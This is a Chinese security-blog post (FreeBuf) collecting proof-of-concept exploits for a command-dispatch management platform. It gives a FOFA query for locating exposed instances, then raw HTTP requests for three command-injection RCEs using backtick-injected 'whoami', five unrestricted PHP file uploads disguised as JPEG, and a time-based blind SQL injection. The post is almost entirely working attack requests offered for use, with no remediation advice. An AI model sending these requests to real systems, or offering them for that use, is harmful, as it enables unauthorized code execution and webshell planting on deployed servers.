freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规
报告 专辑
行业服务
政 府
CNCERT CNNVD
会员体系(甲方) 会员体系(厂商) 产品名录 企业空间
知识大陆

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

指挥调度管理平台 漏洞合集复现(附poc)
  • 关注
指挥调度管理平台 漏洞合集复现(附poc)
2024-01-20 16:57:06

fofa语句

app="指挥调度管理平台"


一、invite_one_ptter RCE漏洞

GET /api/client/ptt/invite_one_ptter.php?callee=all&caller=1&pttnumber=`whoami>test.txt`&force=1&timeout=1 HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
 
 
访问文件:
GET /api/client/ptt/test.txt HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

二、invite2videoconf RCE漏洞

GET /api/client/invite2videoconf.php?callee=1&roomid=`whoami>test.txt` HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
 
 
访问文件:
GET /api/client/test.txt HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

三、fileupload-file-upload 文件上传1

POST /api/client/fileupload.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 477
 
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="file"; filename="rcnlsq.php"
Content-Type: image/jpeg
 
5465rcnlsq
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="number";
 
5465
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="type";
 
1
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="title";
 
1
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
 
文件地址为/upload/file/images/{rand}/{current_year_month_day}/{timestamp}{i}.php    {rand}与上述number对应的数字一致,{current_year_month_day}为当前年月日,格式如20240120,{timestamp}为上传文件的毫秒级时间戳,{i}为0-9随机数,即此文件路径需要爆破 时间戳与i的组合值。

四、upload-file-upload 文件上传2

POST /api/client/upload.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 194
 
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="ulfile"; filename="lztkkl.php"
Content-Type: image/jpeg
 
99647lztkkl
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
 
文件地址:
GET /upload/lztkkl.php HTTP/1.1
Host: baidu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

五、task-uploadfile-file-upload 文件上传3

POST /api/client/task/uploadfile.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 198
 
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="uploadfile"; filename="rvfuid.php"
Content-Type: image/jpeg
 
97236rvfuid
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
 
文件路径:响应包获取

六、event-uploadfile-file-upload 文件上传4

POST /api/client/event/uploadfile.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Length: 198
 
------WebKitFormBoundaryVBf7Cs8QWsfwC82M
Content-Disposition: form-data; name="uploadfile"; filename="iuctmt.php"
Content-Type: image/jpeg
 
48620iuctmt
------WebKitFormBoundaryVBf7Cs8QWsfwC82M--
 
文件地址:响应包获取

七、invite_one_member RCE漏洞

GET /api/client/audiobroadcast/invite_one_member.php?callee=1&roomid=`whoami>test.txt` HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
 
 
访问文件:
GET /api/client/audiobroadcast/test.txt HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

八、client-upload  文件上传5

POST /api/client/upload.php HTTP/1.1
Host: ip
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
Content-Length: 200
 
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="ulfile"; filename="dzfuxvtm.php"
Content-Type: image/jpeg
 
dzfuxvtm186448
------WebKitFormBoundarymVk33liI64J7GQaK--
 
文件地址:
GET /upload/dzfuxvtm.php HTTP/1.1
Host: ip
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close

九、 getusername SQL注入

/api/client/getusername.php?number=1%20AND%20(SELECT%205443%20FROM%20(SELECT(SLEEP(10)))FIjE)

# 漏洞 # 渗透测试 # 黑客 # web安全 # 漏洞复现
本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录
fofa语句
    一、invite_one_ptter RCE漏洞
      二、invite2videoconf RCE漏洞
        三、fileupload-file-upload 文件上传1
          四、upload-file-upload 文件上传2
            五、task-uploadfile-file-upload 文件上传3
              六、event-uploadfile-file-upload 文件上传4
                七、invite_one_member RCE漏洞
                  八、client-upload  文件上传5
                    九、 getusername SQL注入